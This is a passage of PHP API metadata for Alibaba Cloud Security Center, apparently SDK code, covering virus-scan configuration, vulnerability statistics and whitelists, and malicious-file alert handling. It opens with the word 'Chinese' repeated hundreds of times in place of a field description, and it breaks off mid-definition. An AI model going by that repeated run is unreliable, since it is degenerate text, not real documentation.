Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese Chinese.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6BDEFC', 'title' => ''], 'Data' => [ 'description' => 'The data returned when the invoke is successful.', 'type' => 'object', 'properties' => [ 'SelectionKey' => ['description' => 'The key that stores asset information.'."\n" .'> You can invoke the [GetAssetSelectionConfig](~~GetAssetSelectionConfig~~) operation to obtain this parameter.', 'type' => 'string', 'example' => '345ddbea-a57f-437e-832f-fb7a1202xxxx', 'title' => ''], 'TaskType' => ['description' => 'The node type. Valid values:'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.', 'type' => 'string', 'example' => 'VIRUS_VUL_SCHEDULE_SCAN', 'title' => ''], 'ScanType' => ['description' => 'The scan type of the virus scan. Valid values:'."\n" .'- **system**: system scan.'."\n" .'- **user**: custom scan.', 'type' => 'string', 'example' => 'user', 'title' => ''], 'ScanPath' => [ 'description' => 'The scan path information required for a custom scan.', 'type' => 'array', 'items' => ['description' => 'The scan path information required for a custom scan.', 'type' => 'string', 'example' => '/root', 'title' => ''], 'title' => '', 'example' => '', ], 'PeriodUnit' => ['description' => 'The unit of the scan epoch. Valid values:'."\n" .'- **day**: day.', 'type' => 'string', 'example' => 'day', 'title' => ''], 'TargetStartTime' => ['description' => 'The node start time, in hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'TargetEndTime' => ['description' => 'The node end time, in hours.', 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'IntervalPeriod' => ['description' => 'The interval epoch.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'Enable' => ['description' => 'Indicates whether the task is enabled. Valid values:'."\n" .'- **1**: enabled.'."\n" .'- **0**: shutdown.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the configuration.'."\n" .'> You can invoke the [DescribeCycleTaskList](~~DescribeCycleTaskList~~) operation to obtain this parameter.', 'type' => 'string', 'example' => '97a1fed216908e417407344e1505xxxx', 'title' => ''], 'AdditionType' => [ 'description' => 'The extended scan types.', 'type' => 'array', 'items' => ['description' => 'The extended scan type. Valid values:'."\n" .'- **SCAN_MEMORY**: memory scan.', 'type' => 'string', 'example' => 'SCAN_MEMORY', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve periodic virus scan configuration', 'summary' => 'Retrieves the configuration of a periodic virus scan task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVirusScanConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetVirusScanConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6BDEFC\\",\\n \\"Data\\": {\\n \\"SelectionKey\\": \\"345ddbea-a57f-437e-832f-fb7a1202xxxx\\",\\n \\"TaskType\\": \\"VIRUS_VUL_SCHEDULE_SCAN\\",\\n \\"ScanType\\": \\"user\\",\\n \\"ScanPath\\": [\\n \\"/root\\"\\n ],\\n \\"PeriodUnit\\": \\"day\\",\\n \\"TargetStartTime\\": 0,\\n \\"TargetEndTime\\": 6,\\n \\"IntervalPeriod\\": 7,\\n \\"Enable\\": 1,\\n \\"ConfigId\\": \\"97a1fed216908e417407344e1505xxxx\\",\\n \\"AdditionType\\": [\\n \\"SCAN_MEMORY\\"\\n ]\\n }\\n}","type":"json"}]', ], 'GetVirusScanLatestTaskStatistic' => [ 'summary' => 'Retrieves the scan information of the latest virus scan.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1', 'title' => ''], 'Data' => [ 'description' => 'The custom result data.', 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'string', 'example' => 'fc98d58eb56f699d49bf7ebbd6d7****', 'title' => ''], 'ScanTime' => ['description' => 'The timestamp of the scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1681145862000', 'title' => ''], 'Status' => ['description' => 'The status of the scan task.'."\n" ."\n" .'**Valid values for the main task:**'."\n" .'- **0**: The task is pending.'."\n" .'- **10**: The scan is in progress.'."\n" .'- **100**: The scan is complete.'."\n" ."\n" .'**Valid values for the subtask:**'."\n" .'- **0**: The scan is pending.'."\n" .'- **20**: The detection script is delivered.'."\n" .'- **50**: The scan is running on the server.'."\n" .'- **100**: The scan is complete.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SuspiciousCount' => ['description' => 'The number of security alerts detected by the scan.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SuspiciousMachine' => ['description' => 'The number of servers on which risks are detected.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'SafeMachine' => ['description' => 'The number of servers on which no risks are detected.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScanMachine' => ['description' => 'The number of servers scanned in this virus scan.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'ScanType' => ['description' => 'The scan type of this virus scan. Valid values:'."\n" .'- **system**: automatic system scan.'."\n" .'- **user**: user-defined scan.', 'type' => 'string', 'example' => 'system', 'title' => ''], 'ScanPath' => [ 'description' => 'The file paths specified for scanning when the scan type is user-defined.', 'type' => 'array', 'items' => ['description' => 'The file path.', 'type' => 'string', 'example' => 'C:/test1', 'title' => ''], 'title' => '', 'example' => '', ], 'Progress' => ['description' => 'The progress percentage of the scan task.', 'type' => 'string', 'example' => '92', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'testMahine1', 'title' => ''], 'CompleteMachine' => ['description' => 'The number of servers that completed the scan.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'UnCompleteMachine' => ['description' => 'The number of servers that have not completed the scan or failed the scan.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RiskLevel' => ['description' => 'The highest risk level of the alerts detected by the scan. Valid values:'."\n" ."\n" .'- **high**: high-risk.'."\n" .'- **medium**: medium-risk.'."\n" .'- **low**: low-risk.', 'type' => 'string', 'example' => 'medium', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve the latest virus scan information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVirusScanLatestTaskStatistic'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetVirusScanLatestTaskStatistic', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\",\\n \\"Data\\": {\\n \\"TaskId\\": \\"fc98d58eb56f699d49bf7ebbd6d7****\\",\\n \\"ScanTime\\": 1681145862000,\\n \\"Status\\": 0,\\n \\"SuspiciousCount\\": 2,\\n \\"SuspiciousMachine\\": 2,\\n \\"SafeMachine\\": 1,\\n \\"ScanMachine\\": 3,\\n \\"ScanType\\": \\"system\\",\\n \\"ScanPath\\": [\\n \\"C:/test1\\"\\n ],\\n \\"Progress\\": \\"92\\",\\n \\"MachineName\\": \\"testMahine1\\",\\n \\"CompleteMachine\\": 2,\\n \\"UnCompleteMachine\\": 1,\\n \\"RiskLevel\\": \\"medium\\"\\n }\\n}","type":"json"}]', ], 'GetVulStatistics' => [ 'summary' => 'Queries the statistics on vulnerabilities in asset groups.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '10.12.XX.XX', 'title' => ''], ], [ 'name' => 'GroupIdList', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group. Separate multiple IDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of asset groups.'."\n", 'type' => 'string', 'required' => true, 'example' => '9997897', 'title' => ''], ], [ 'name' => 'TypeList', 'in' => 'query', 'schema' => ['description' => 'The type of the vulnerability whose statistics you want to query. Separate multiple types with commas (,). Valid values:'."\n" ."\n" .'* **cve**: Linux software vulnerability'."\n" .'* **sys**: Windows system vulnerability'."\n" .'* **cms**: Web-CMS vulnerability'."\n" .'* **emg**: urgent vulnerability'."\n" .'* **app**: vulnerability detected by using a web scanner'."\n" .'* **sca**: vulnerability detected based on software component analysis'."\n", 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '3FE272FA-7263-4554-A90F-A7857945A6D5', 'title' => ''], 'VulLaterSum' => ['description' => 'The number of vulnerabilities that have the medium priority.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulNntfSum' => ['description' => 'The number of vulnerabilities that have the low priority.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'VulAsapSum' => ['description' => 'The number of vulnerabilities that have the high priority.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"3FE272FA-7263-4554-A90F-A7857945A6D5\\",\\n \\"VulLaterSum\\": 0,\\n \\"VulNntfSum\\": 0,\\n \\"VulAsapSum\\": 16\\n}","errorExample":""},{"type":"xml","example":"\\n 16\\n 0\\n 0\\n 3FE272FA-7263-4554-A90F-A7857945A6D5\\n","errorExample":""}]', 'title' => 'GetVulStatistics', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVulStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetVulStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetVulWhitelist' => [ 'summary' => 'Retrieves information about a vulnerability whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'VulWhitelistId', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1275', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F', 'title' => ''], 'VulWhitelist' => [ 'description' => 'The information about the whitelist.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the whitelist.', 'type' => 'integer', 'format' => 'int64', 'example' => '1275', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'oval:com.redhat.rhsa:def:20173263', 'title' => ''], 'Type' => ['description' => 'The type of the vulnerability.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'RHSA-2017:3263: curl security update', 'title' => ''], 'Reason' => ['description' => 'The reason why the vulnerability is added to the whitelist.', 'type' => 'string', 'example' => '忽略', 'title' => ''], 'Target' => ['description' => 'The application scope of the rule. The value is a JSON string that contains the following fields:'."\n" ."\n" .'- **type**: the type of the assets to which the rule is applied. Valid values:'."\n" ."\n" .' - **Uuid**: server'."\n" ."\n" .' - **GroupId**: server group'."\n" ."\n" .'- **groupIds**: the ID of the server group'."\n" ."\n" .'- **uuids**: the UUID of the server'."\n" ."\n" .'> If this parameter is empty, the rule is applied to all types of assets.', 'type' => 'string', 'example' => '{'."\n" .' "type": "GroupId",'."\n" .' "uuids": [],'."\n" .' "groupIds": ['."\n" .' 10782678'."\n" .' ]'."\n" .'}', 'title' => ''], 'Whitelist' => ['description' => 'The information about the vulnerability that is added to the whitelist. The value is a JSON string that contains the following fields:'."\n" ."\n" .'- **Name**: the name of the vulnerability.'."\n" ."\n" .'- **Type**: the type of the vulnerability. Valid values:'."\n" ."\n" .' - **cve**: Linux software vulnerability'."\n" ."\n" .' - **sys**: Windows system vulnerability'."\n" ."\n" .' - **cms**: Web-CMS vulnerability'."\n" ."\n" .' - **app**: application vulnerability'."\n" ."\n" .' - **emg**: urgent vulnerabilities'."\n" ."\n" .'- **AliasName**: the alias of the vulnerability.', 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "Name": "oval:com.redhat.rhsa:def:20173263",'."\n" .' "Type": "cve",'."\n" .' "AliasName": "RHSA-2017:3263: curl security update"'."\n" .' }'."\n" .']', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidId', 'errorMessage' => 'Invalid ID.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\",\\n \\"VulWhitelist\\": {\\n \\"Id\\": 1275,\\n \\"Name\\": \\"oval:com.redhat.rhsa:def:20173263\\",\\n \\"Type\\": \\"cve\\",\\n \\"AliasName\\": \\"RHSA-2017:3263: curl security update\\",\\n \\"Reason\\": \\"忽略\\",\\n \\"Target\\": \\"{\\\\n \\\\\\"type\\\\\\": \\\\\\"GroupId\\\\\\",\\\\n \\\\\\"uuids\\\\\\": [],\\\\n \\\\\\"groupIds\\\\\\": [\\\\n 10782678\\\\n ]\\\\n}\\",\\n \\"Whitelist\\": \\"[\\\\n {\\\\n \\\\\\"Name\\\\\\": \\\\\\"oval:com.redhat.rhsa:def:20173263\\\\\\",\\\\n \\\\\\"Type\\\\\\": \\\\\\"cve\\\\\\",\\\\n \\\\\\"AliasName\\\\\\": \\\\\\"RHSA-2017:3263: curl security update\\\\\\"\\\\n }\\\\n]\\"\\n }\\n}","type":"json"}]', 'title' => 'GetVulWhitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVulWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetVulWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'VulWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:vulwhitelist/{#VulWhitelistId}'], ], ], ], ], ], 'GrantSwitchAgreement' => [ 'summary' => 'Grants authorization for feature migration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '163092', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'IsAgree', 'in' => 'query', 'schema' => ['description' => 'Specifies whether you agree to the data migration from the Hong Kong (China) region to the Singapore data center. Valid values:'."\n" ."\n" .'- **true**: Agree.'."\n" ."\n" .'- **false**: Disagree.', 'type' => 'boolean', 'default' => 'false', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The switch type. Valid values:'."\n" ."\n" .'- **sg_switch**: data migration from the Hong Kong (China) region to the Singapore data center.', 'type' => 'string', 'required' => false, 'example' => 'sg_switch', 'title' => ''], ], [ 'name' => 'IsImmediate', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to schedule data migration of data from the Hong Kong (China) region to the Singapore data center within 24 hours. Valid values:'."\n" ."\n" .'- **true**: Schedule the switch within 24 hours.'."\n" ."\n" .'- **false**: Do not schedule. For users who have cloud services in the Hong Kong (China) region, data migration will be automatically completed on March 5, 2026. For users who do not have cloud services in the Hong Kong (China) region, data migration will be automatically completed on November 17, 2025.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'IsConfirmed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the user confirms that the data migration from the Hong Kong (China) region to the Singapore data center has been completed.'."\n" ."\n" .'- **true**: Confirmed. The user has confirmed that the data migration from the Hong Kong (China) region to the Singapore data center has been completed, and the notification pop-up window no longer needs to be displayed.'."\n" .'- **false**: Not confirmed. The user has not confirmed that the data migration from the Hong Kong (China) region to the Singapore data center has been completed, and the notification pop-up window still needs to be displayed.', 'type' => 'boolean', 'required' => false, 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911459F', 'title' => ''], 'Code' => ['description' => 'The response code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Grant authorization for feature migration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GrantSwitchAgreement'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:GrantSwitchAgreement', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911459F\\",\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\"\\n}","type":"json"}]', ], 'HandleMaliciousFiles' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184806', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The type of operation. Valid values:'."\n" .'- addWhitelist: adds to the whitelist.'."\n" .'- offWhitelist: removes from the whitelist.', 'type' => 'string', 'required' => false, 'example' => 'addWhitelist', 'title' => ''], ], [ 'name' => 'FileIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of file IDs to process.'."\n" .'> You can call [ListAgentlessMaliciousFiles](~~ListAgentlessMaliciousFiles~~) to obtain the IDs.'."\n" .'> -.', 'type' => 'array', 'items' => ['description' => 'The ID of the malicious file.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '265**', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The unique ID generated by Alibaba Cloud for the request.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8B****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Add or remove security alerts to or from the whitelist', 'summary' => 'Adds or removes security alerts detected by the agentless detection feature to or from the whitelist.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleMaliciousFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:HandleMaliciousFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8B****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'HandleObjectScanEvent' => [ 'summary' => 'Handles malicious file detection alerts.', 'path' => '', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], ], 'parameters' => [ [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The event ID.', 'type' => 'string', 'required' => false, 'example' => '81****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The target status. Valid values:'."\n" ."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Manually handled.'."\n" .'- **2**: Whitelisted.'."\n" .'- **3**: Ignored.'."\n" .'- **4**: Access denied.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'BatchType', 'in' => 'query', 'schema' => ['description' => 'Specifies the type for batch processing of similar alerts. Valid values:'."\n" ."\n" .'- **sha256**: by file content'."\n" .'- **eventName**: by alert name.', 'type' => 'string', 'required' => false, 'example' => 'sha256', 'title' => ''], ], [ 'name' => 'RuleConditionList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of whitelist rules. This parameter takes effect only when the alert is whitelisted.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The whitelist field. Valid values:'."\n" ."\n" .'- **ossKey**: file path'."\n" .'- **bucketName**: bucket name'."\n" .'- **md5**: file MD5'."\n" .'- **sha256**: file SHA-256.', 'type' => 'string', 'required' => false, 'example' => 'ossKey', 'title' => ''], 'Operate' => ['description' => 'The operator. Valid values:'."\n" ."\n" .'- **contains**: Contains.'."\n" .'- **not_contains**: Does not contain.'."\n" .'- **str_equal**: 